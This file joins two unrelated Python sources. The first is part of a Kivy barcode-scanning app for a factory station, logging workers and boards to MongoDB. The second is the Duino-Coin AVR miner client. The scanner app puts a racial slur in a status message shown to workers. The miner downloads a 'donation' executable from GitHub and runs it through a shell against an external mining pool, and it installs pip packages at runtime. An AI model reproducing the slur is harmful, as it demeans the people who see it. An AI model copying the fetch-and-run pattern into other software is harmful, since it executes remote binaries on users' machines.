size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[37]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[38]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
Label:
text: root.board_name_list[39]
size_hint: 1.5 , 1
text_size: self.width, self.height
font_size: self.parent.width/root.board_name_text_scale
halign: 'left'
valign: 'middle'
BoxLayout:
orientation: 'vertical'
Label:
id: cut30
text: '0'
color: 1,0,0,1
Label:
id: cut31
text: '0'
color: 1,0,0,1
Label:
id: cut32
text: '0'
color: 1,0,0,1
Label:
id: cut33
text: '0'
color: 1,0,0,1
Label:
id: cut34
text: '0'
color: 1,0,0,1
Label:
id: cut35
text: '0'
color: 1,0,0,1
Label:
id: cut36
text: '0'
color: 1,0,0,1
Label:
id: cut37
text: '0'
color: 1,0,0,1
Label:
id: cut38
text: '0'
color: 1,0,0,1
Label:
id: cut39
text: '0'
color: 1,0,0,1
""")
class MessageWindow(Popup):
def __init__(self, **kwargs):
super(MessageWindow, self).__init__(**kwargs)
Clock.schedule_interval(self.update, 0.2)
def update(self, *args):
global last_message
pop = self.ids['messagetext']
pop.text = last_message
class InfoWindow(Popup):
board_name_list = ['00 - OSTRICH S S', '01 - OSTRICH M S', '02 - JUNKO M', '03 - CHAUMA M S', '04 - CHAUMA W S',
'05 - BUNTING', '06 - WROBEL', '07 - FLAMINGO M S', '08 - FLAMINGO S S', '09 - FANTAIL',
'10 - VERDIN S', '11 - STARLING', '12 - ERGET S S', '13 - ERGET M S', '14 - KAROO M S',
'15 - KAROO M', '16 - FLAMINGO MEDIUM', '17 - OSTRICH MEDIUM', '18 - VERDIN MEDIUM', '19 - ERGET MEDIUM',
'20 - CHAUMA W', '21 - CHAUMA M', '22 - EMPTY', '23 - EMPTY', '24 - EMPTY',
'25 - EMPTY', '26 - EMPTY', '27 - EMPTY', '28 - EMPTY', '29 - EMPTY',
'30 - EMPTY', '31 - EMPTY', '32 - EMPTY', '33 - EMPTY', '34 - EMPTY',
'35 - EMPTY', '36 - EMPTY', '37 - EMPTY', '38 - EMPTY', '39 - EMPTY', ]
board_name_text_scale = 7
def __init__(self, **kwargs):
super(InfoWindow, self).__init__(**kwargs)
def popup_count(self):
global lis_window
co = 0
while co < 20:
mo = ''
code_win[co] = self.ids[lis_window[co]]
if (co < 10):
mo = str('0' + str(co))
if (co > 9):
mo = str(co)
code_win[co].text = str(collection_tofinish.find({"model": mo}).count()) #tu zmienic !!
co += 1
class MainWindow(Screen):
def __init__(self, **kwargs):
super(MainWindow, self).__init__(**kwargs)
Clock.schedule_interval(self.main_handling, 0.2)
Clock.schedule_interval(self.display_message, 2)
Clock.schedule_interval(self.th, 1)
def message_read(self, *args):
global message
try:
message = s.recv(512)
message = message.decode('utf-8')
message = str(message)
except:
pass
def th(self, *args):
# threading.Thread(target=self.message_read).start()
self.message_read()
def display_message(self, *args):
global message
global last_message
if (message != ""):
last_message = message
MessageWindow().open()
message = ""
def show_info(self, *args):
InfoWindow().open()
def serial_write(self, data_to_send):
MasterModule.write(str(data_to_send).encode('utf-8'))
MasterModule.flush()
time.sleep(0.01)
def serial_clear(self):
if (MasterModule.inWaiting() > 0):
MasterModule.read(MasterModule.inWaiting())
MasterModule.flush()
def serial_read(self):
myData = MasterModule.read(MasterModule.inWaiting())
return myData
def ask_data(self):
readData = ""
sendConfirmation = ""
readConfirmation = ""
counter = 0
while (readConfirmation[0:4] != 'AC2E' or counter < 3):
readData = ""
sendConfirmation = ""
readConfirmation = ""
self.serial_clear()
self.serial_write('AC1E')
time.sleep(0.01)
#readData = self.serial_read().decode()
readData = self.serial_read().decode(encoding='UTF-8', errors='ignore')
if (readData[0:1] != '0'):
sendConfirmation = 'AD' + str(readData[8:17]) + 'E'
self.serial_clear()
self.serial_write(sendConfirmation)
time.sleep(0.01)
readConfirmation = self.serial_read().decode()
if (readConfirmation[0:4] == 'AC2E'):
return readData[1:17]
break
else:
counter = counter + 1
if (counter == 3):
return -1
break
else:
return 0
break
def label_handling(self):
global label_list
global current_code
global current_time
global last_record
global data
n = 9
while n > 0:
m = n - 1
code[n] = self.ids[label_list[n]]
code[m] = self.ids[label_list[m]]
code[n].text = code[m].text
n = n - 1
code[0] = self.ids[label_list[0]]
code[0].text = str(last_record)
current_code.text = str(data[3:15])
current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
last_record = current_time.text + " " + current_code.text
def nd2category(self):
global sec
global worker
print (" 2 nd category button pressed")
if (worker != ""):
current_code = self.ids['last_code']
status_label = self.ids['status']
current_time = self.ids['last_code_time']
current_code.text = ''
status_label.text = 'SCAN CODE'
current_time.text = ''
sec = 1
def addcoment(self):
global com
global worker
print(" add comment button pressed")
if (worker != ""):
current_code = self.ids['last_code']
status_label = self.ids['status']
current_time = self.ids['last_code_time']
current_code.text = 'TYPE COMMENT '
status_label.text = 'SCAN CODE'
current_time.text = 'AND'
com = 1
def data_check(self): # tu_zmienic !!!
global data_added
is_present = 0
check_counter = 0
while (is_present == 0):
is_present = collection_04.find({"code": read_code}).count()
if (is_present > 0):
data_added = 1
break
else:
check_counter += 1
if (check_counter > 8):
data_added = - 1
break
def comm_check(self): # tu zmienic !!!
global comm_added
is_present = 0
check_counter = 0
while (is_present == 0):
is_present = collection_tostock.find({"code": read_code}).count()
if (is_present > 0):
comm_added = 1
break
else:
check_counter += 1
if (check_counter > 8):
comm_added = -1
break
def comment_check(self):
global comment_added
is_present = 0
check_counter = 0
while (is_present == 0 and comment_added == 0):
is_present = comments.find({"timestamp": timestamp}).count()
if (is_present > 0):
comment_added = 1
break
else:
check_counter += 1
if (check_counter > 8):
comment_added = -1
break
def main_handling(self, *args):
global code
global worker
global current_code
global machine_state
global current_time
global last_record
global message
global data
global time_tcp
global code_tcp
global read_code
global timestamp
global data_added
global comm_added
global comment_added
global sec
global com
global worker_time_start
global worker_time_stop
current_code = self.ids['last_code']
status_label = self.ids['status']
current_time = self.ids['last_code_time']
i_have_no_idea_for_variable = self.ids['worker_label']
comment_label = self.ids['comment']
data = self.ask_data()
comment_added = 0
comm_added = 0
data_added = 0
if (machine_state == 0 and data == 0):
status_label.text = 'CONNECTED'
current_code.text = 'SCAN NIGGER CARD'
machine_state = 1
if (data != 0 and data != -1):
worker_name = list(staff.find({"code": data[3:15]}, {"name": 1, "_id": 0}))
worker_name = str(worker_name)
timestamp = str(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'))
read_code = str(data[3:15])
model = data[5:7]
if (len(worker_name) > 2 and sec == 0 and com == 0):
worker_name = worker_name[11:len(worker_name) - 3]
if (worker != ""):
worker_time_stop = datetime.datetime.now()
print('stop time: ' + str(worker_time_stop))
print('worker finish work: ' + worker)
t = str(round((worker_time_stop - worker_time_start).total_seconds() / 60))
worker_time = {
"worker": worker,
"finish": timestamp,
"start": str(worker_time_start),
"time": t,
"station": "03"
}
collection_workertime.insert_one(worker_time)
if (worker_name == worker):
current_time.text = '-'
i_have_no_idea_for_variable.text ="-"
worker = ""
machine_state = 0
else:
worker_time_start = datetime.datetime.now()
print('start time: ' + str(worker_time_start))
worker = worker_name
i_have_no_idea_for_variable.text = worker
current_code.text = 'READY TO WORK'
status_label.text = 'CONNECTED'
print('setting worker to: %s' % worker_name)
current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
else:
if (worker != ""):
if (sec == 0 and com == 0):
if (collection_04.find({"code": read_code}).count() == 0): # tu zmienic !!!
new_data = {
"timestamp": timestamp,
"year_number": str(datetime.datetime.now().strftime('%j')),
"year": str(datetime.datetime.now().strftime('%Y')),
"month": str(datetime.datetime.now().strftime('%m')),
"day": str(datetime.datetime.now().strftime('%d')),
"hour": str(datetime.datetime.now().strftime('%H')),
"minute": str(datetime.datetime.now().strftime('%M')),
"second": str(datetime.datetime.now().strftime('%S')),
"code": read_code,
"model": model,
"worker": worker,
"operation": "04", # tu zmienic !!!
}
collection_04.insert_one(new_data) # tu zmienic !!!
print("added to 04 base : " + read_code) # tu zmienic !!!
new_data2 = {
"code": read_code,
"model": model
}
collection_tostock.insert_one(new_data2) # tu zmienic !!!
collection_evermade.insert_one(new_data2) # tu zmienic !!! NOWE 02.03.2017
i = db.tofinish.delete_many({"code": read_code}).deleted_count # tu zmienic !!! uwaga przy 00
if (i < 1):
missing_code = {
"code": read_code,
"model": model,
"missing": "03", # tu zmienic !!!
"timestamp": timestamp
}
collection_missingcodes.insert_one(missing_code)
print("missing in 03 base : " + read_code) # tu zmienic !!!
if(str(comment_label.text) != ''):
comm = {
"timestamp": timestamp,
"code": read_code,
"model": model,
"worker": worker,
"comment": comment_label.text
}
comments.insert_one(comm)
comment_added = 1
else:
comment_added = 1
data_added = 1 #self.data_check() zlikwidowałem bo mongo i tak sprawdza czy jest ok. Mozna potem dodać rózne teksty pod wyjatki
comm_added = 1 #self.comm_check()
comment_added = 1 #self.comment_check()
if (data_added == 1 and comm_added == 1 and comment_added == 1):
self.label_handling()
status_label.text = 'WRITED'
code_tcp = str(data[3:15])
time_tcp = timestamp
comment_label.text = ""
current_code.text = read_code
current_time.text = timestamp[11:19]
print( read_code + " " + timestamp)
else:
current_code.text = read_code
current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
status_label.text = 'DUPLICATED'
print('element duplicated %s' % str(read_code))
if (sec == 1):
if (staff.find({"code": read_code}).count() == 0):
if (second_category.find({"code": read_code}).count() == 0 ):
nd2data = {
"code": read_code,
"timestamp": timestamp,
"model": model
}
second_category.insert_one(nd2data)
print('board added to 2nd cat: ' + read_code)
status_label.text = 'ADDED 2ND CAT'
current_code.text = read_code
current_time.text = timestamp[11:19]
sec = 0
else:
status_label.text = 'ALREADY ADDED'
current_code.text = read_code
current_time.text = timestamp[11:19]
sec = 0
else:
print('error scanning worker card')
status_label.text = 'SECOND CAT'
current_code.text = 'PEOPLE ARE NOT'
current_time.text = timestamp[11:19]
sec = 0
if (com == 1):
if (comment_label.text == ""):
status_label.text = 'COMMENT EMPTY !'
current_code.text = 'ERROR'
current_time.text = timestamp[11:19]
com = 0
if (comment_label.text != ""):
com_data = {
"code": read_code,
"timestamp": timestamp,
"comment": comment_label.text,
"model": model
}
comments.insert_one(com_data)
print('insert comment: ' + comment_label.text)
status_label.text = 'ADDED COMMENT'
current_code.text = read_code
current_time.text = timestamp[11:19]
comment_label.text = ""
com = 0
else:
current_time.text = str(datetime.datetime.now().strftime('%H:%M:%S'))
status_label.text = 'NO WORKER SCANNED'
class ScanApp(App):
def __init__(self, **kwargs):
super(ScanApp, self).__init__(**kwargs)
Clock.schedule_interval(self.send_tcp, 0.5)
def send_tcp(self, *args):
global time_tcp
global code_tcp
global worker
global send_zero
if (time_tcp != "1" and code_tcp != "1"):
string_to_send = '!' + time_tcp + '*' + '/' + code_tcp + '*' + ';' + worker + '*' + '$' + '1' + '*'
s2.sendall(str.encode(string_to_send))
code_tcp = "1"
time_tcp = "1"
send_zero = 1
elif (send_zero == 1):
string_to_send = '*' + '$' + '0'
s2.sendall(str.encode(string_to_send))
send_zero = 0
def build(self):
return MainWindow()
if __name__ == '__main__':
ScanApp().run()
|
AVR_Miner.py | #!/usr/bin/env python3
##########################################
# Duino-Coin Python AVR Miner (v2.47)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from pathlib import Path
from platform import system
from re import sub
from signal import SIGINT, signal
from socket import socket
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from threading import Lock
from time import ctime, sleep, strptime, time
import select
def install(package):
# Install pip package automatically
check_call([sys.executable, "-m", "pip", "install", package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if pyserial is installed
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ 'Pyserial is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pyserial" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install("pyserial")
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ 'Colorama is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "colorama" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install("colorama")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install("requests")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ 'Pypresence is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "pypresence" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install("pypresence")
# Global variables
MINER_VER = "2.47" # Version number
SOCKET_TIMEOUT = 30
AVR_TIMEOUT = 7
RESOURCES_DIR = "AVRMiner_" + str(MINER_VER) + "_resources"
shares = [0, 0]
diff = 0
donator_running = False
job = ""
debug = "n"
rig_identifier = "None"
# Serverip file
server_ip_file = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/gh-pages/serverip.txt")
donation_level = 0
hashrate = 0
config = ConfigParser()
thread_lock = Lock()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "AVR_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("sk"):
lang = "slovak"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
try:
# Read language from configfile
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["arduminer"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
def get_string(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(
Style.RESET_ALL
+ now().strftime(Style.DIM + "%H:%M:%S.%f ")
+ "DEBUG: "
+ str(text))
def title(title):
# Window title
if osname == "nt":
# Windows systems
ossystem("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def connect():
# Server connection
global server_ip
global server_port
while True:
try:
try:
socket.close()
except Exception:
pass
debug_output("Connecting to "
+ str(server_ip)
+ str(":")
+ str(server_port))
soc = socket()
soc.settimeout(SOCKET_TIMEOUT)
# Establish socket connection to the server
soc.connect(
(str(server_ip),
int(server_port)))
# Get server version
ready = select.select([soc], [], [], SOCKET_TIMEOUT)
if ready[0]:
serverVersion = soc.recv(10).decode().rstrip("\n")
debug_output("Server version: " + serverVersion)
if float(serverVersion) <= float(MINER_VER):
# If miner is up-to-date, display a message and continue
pretty_print(
"net0",
get_string("connected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
pretty_print(
"sys0",
" Miner is outdated (v"
+ MINER_VER
+ ") -"
+ get_string("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ get_string("update_warning"),
"warning")
sleep(10)
break
except Exception as e:
pretty_print(
"net0",
get_string("connecting_error")
+ Style.NORMAL
+ " ("
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
return soc
def handler(signal_received, frame):
# SIGINT handler
pretty_print(
"sys0",
get_string("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ get_string("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
# Config loading section
global username
global donation_level
global avrport
global debug
global rig_identifier
# Initial configuration section
if not Path(str(RESOURCES_DIR) + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ get_string("basic_config_tool")
+ RESOURCES_DIR
+ get_string("edit_config_file_warning"))
print(
Style.RESET_ALL
+ get_string("dont_have_account")
+ Fore.YELLOW
+ get_string("wallet")
+ Fore.RESET
+ get_string("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ports_message"))
portlist = serial.tools.list_ports.comports()
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ " "
+ str(port))
print(Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ports_notice"))
avrport = ""
while True:
avrport += input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_avrport")
+ Fore.RESET
+ Style.BRIGHT)
confirmation = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_anotherport")
+ Fore.RESET
+ Style.BRIGHT)
if confirmation == "y" or confirmation == "Y":
avrport += ","
else:
break
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identifier == "y" or rig_identifier == "Y":
rig_identifier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identifier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ get_string("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == '':
donation_level = 1
if float(donation_level) > int(5):
donation_level = 5
if float(donation_level) < int(0):
donation_level = 0
# Format data
config["arduminer"] = {
"username": username,
"avrport": avrport,
"donate": donation_level,
"language": lang,
"identifier": rig_identifier,
"debug": "n"}
# Write data to file
with open(str(RESOURCES_DIR)
+ "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
avrport = avrport.split(",")
print(Style.RESET_ALL + get_string("config_saved"))
else: # If config already exists, load from it
config.read(str(RESOURCES_DIR) + "/Miner_config.cfg")
username = config["arduminer"]["username"]
avrport = config["arduminer"]["avrport"]
avrport = avrport.split(",")
donation_level = config["arduminer"]["donate"]
debug = config["arduminer"]["debug"]
rig_identifier = config["arduminer"]["identifier"]
def greeting():
# greeting message depending on time
global greeting
print(Style.RESET_ALL)
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = get_string("greeting_morning")
elif current_hour == 12:
greeting = get_string("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = get_string("greeting_afternoon")
elif current_hour >= 18:
greeting = get_string("greeting_evening")
else:
greeting = get_string("greeting_back")
# Startup message
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ get_string("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.MAGENTA
+ "https://github.com/revoxhere/duino-coin")
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ get_string("avr_on_port")
+ Style.BRIGHT
+ Fore.YELLOW
+ " ".join(avrport))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ get_string("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ get_string("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ "DUCO-S1A @ AVR diff")
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ get_string("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identifier)
print(
Style.DIM
+ Fore.MAGENTA
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if osname == "nt":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/donate_executable.exe").is_file():
debug_output(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "donateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/donate_executable").is_file():
debug_output(
"OS is *nix, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "donateExecutableLinux?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/donate_executable", "wb") as f:
f.write(r.content)
def restart_miner():
try:
if donator_running:
donateExecutable.terminate()
except Exception as e:
pretty_print(
"sys0",
"Error closing donate executable"
+ Style.NORMAL
+ Fore.RESET
+ " ("
+ str(e)
+ ")",
"error")
try:
execl(sys.executable, sys.executable, *sys.argv)
except Exception as e:
pretty_print(
"sys0",
"Error restarting miner"
+ " ("
+ str(e)
+ ")",
"error")
def donate():
global donation_level
global donator_running
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x donate_executable "
+ "&& ./donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
pretty_print(
"sys0",
Fore.YELLOW
+ get_string("free_network_warning")
+ get_string("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ get_string("learn_more_donate"),
"warning")
sleep(5)
elif donator_running == False:
if int(donation_level) == 5:
cmd += "50"
elif int(donation_level) == 4:
cmd += "40"
elif int(donation_level) == 3:
cmd += "30"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debug_output(get_string("starting_donation"))
donator_running = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
pretty_print(
"sys0",
get_string("thanks_donation"),
"warning")
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details="Hashrate: " + str(hashrate) + " H/s",
start=startTime,
state="Acc. shares: "
+ str(shares[0])
+ "/"
+ str(shares[0] + shares[1]),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO "standard"
# Usb/net/sys background
if message_type.startswith("net"):
background = Back.BLUE
elif message_type.startswith("usb"):
background = Back.MAGENTA
if message_type.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com):
# Mining section
global hashrate
global server_ip
global server_port
errorCounter = 0
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(server_ip_file, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
server_ip = content[0] # Line 1 = pool address
server_port = content[1] # Line 2 = pool port
debug_output(
"Retrieved pool IP: "
+ server_ip
+ ":"
+ str(server_port))
# Connect to the server
soc = connect()
break
except Exception as e:
# If there was an error with grabbing data from GitHub
pretty_print(
"net"
+ str(''.join(filter(str.isdigit, com))),
get_string("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debug_output("GitHub error: " + str(e))
sleep(10)
while True:
try:
# Connect to the serial port
# comConn = connectToAVR(com)
pretty_print(
"sys"
+ str(''.join(filter(str.isdigit, com))),
get_string("mining_start")
+ Style.NORMAL
+ Fore.RESET
+ get_string("mining_algorithm")
+ str(com)
+ ")",
"success")
break
except Exception as e:
pretty_print(
"usb"
+ str(''.join(filter(str.isdigit, com))),
get_string("mining_avr_connection_error")
+ Style.NORMAL
+ Fore.RESET
+ " (avr connection err: "
+ str(e)
+ ")",
"error")
sleep(5)
while True:
while True:
try:
# Send job request
debug_output("Requested job from the server")
soc.sendall(
bytes(
"JOB,"
+ str(username)
+ ",AVR",
encoding="utf8"))
# Retrieve work
ready = select.select([soc], [], [], SOCKET_TIMEOUT)
if ready[0]:
job = soc.recv(100).decode()
# Split received data
job = job.rstrip("\n").split(",")
# Check if username is correct
if job[1] == "This user doesn't exist":
pretty_print(
"net"
+ str(''.join(filter(str.isdigit, com))),
get_string("mining_user")
+ str(username)
+ get_string("mining_not_exist")
+ Style.NORMAL
+ Fore.RESET
+ get_string("mining_not_exist_warning"),
"error")
sleep(10)
# If job was received, continue
elif job[0] and job[1] and job[2]:
diff = int(job[2])
debug_output("Job received: " + " ".join(job))
break
except Exception as e:
pretty_print(
"net"
+ str(''.join(filter(str.isdigit, com))),
get_string("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
restart_miner()
while True:
while True:
with Serial(com,
baudrate=115200,
timeout=AVR_TIMEOUT) as ser:
while True:
ser.write(bytes(str(job[0]
+ "," + job[1]
+ "," + job[2]
+ ","),
encoding="utf-8"))
result = ser.readline().decode()
result = result.rstrip("\n").split(",")
try:
if result[0] and result[1]:
break
except:
pass
try:
debug_output(
"Received result (" + str(result[0]) + ")")
debug_output("Received time (" + str(result[1]) + ")")
ducos1result = result[0]
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
# Calculate hashrate
hashrate = round(
int(result[0]) * 1000000 / int(result[1]), 2)
debug_output(
"Calculated hashrate (" + str(hashrate) + ")")
try:
chipID = result[2]
debug_output(
"Received chip ID (" + str(result[2]) + ")")
# Check if user is using the latest Arduino code
# This is not used yet anywhere, but will soon be
# added as yet another a security measure in the
# Kolka security system for identifying AVR boards
if not chipID.startswith("DUCOID"):
raise Exception("Wrong chipID string")
except Exception:
pretty_print(
"usb"
+ str(''.join(filter(str.isdigit, com))),
" Possible incorrect chipID!"
+ Style.NORMAL
+ Fore.RESET
+ " This will cause problems with the future"
+ " release of Kolka security system",
"warning")
chipID = "None"
break
except Exception as e:
pretty_print(
"usb"
+ str(''.join(filter(str.isdigit, com))),
get_string("mining_avr_connection_error")
+ Style.NORMAL
+ Fore.RESET
+ " (err splitting avr data: "
+ str(e)
+ ")",
"error")
debug_output("Error splitting data: " + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(ducos1result)
+ ","
+ str(hashrate)
+ ",Official AVR Miner (DUCO-S1A) v"
+ str(MINER_VER)
+ ","
+ str(rig_identifier)
+ ","
+ str(chipID),
encoding="utf8"))
except Exception as e:
pretty_print(
"net"
+ str(''.join(filter(str.isdigit, com))),
get_string("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " ("
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(5)
restart_miner()
while True:
try:
responsetimetart = now()
# Get feedback
ready = select.select(
[soc], [], [], SOCKET_TIMEOUT)
if ready[0]:
feedback = soc.recv(48).decode().rstrip("\n")
responsetimestop = now()
# Measure server ping
timeDelta = (responsetimestop -
responsetimetart).microseconds
ping = round(timeDelta / 1000)
debug_output("Successfully retrieved feedback: "
+ str(feedback)
+ " with ping: "
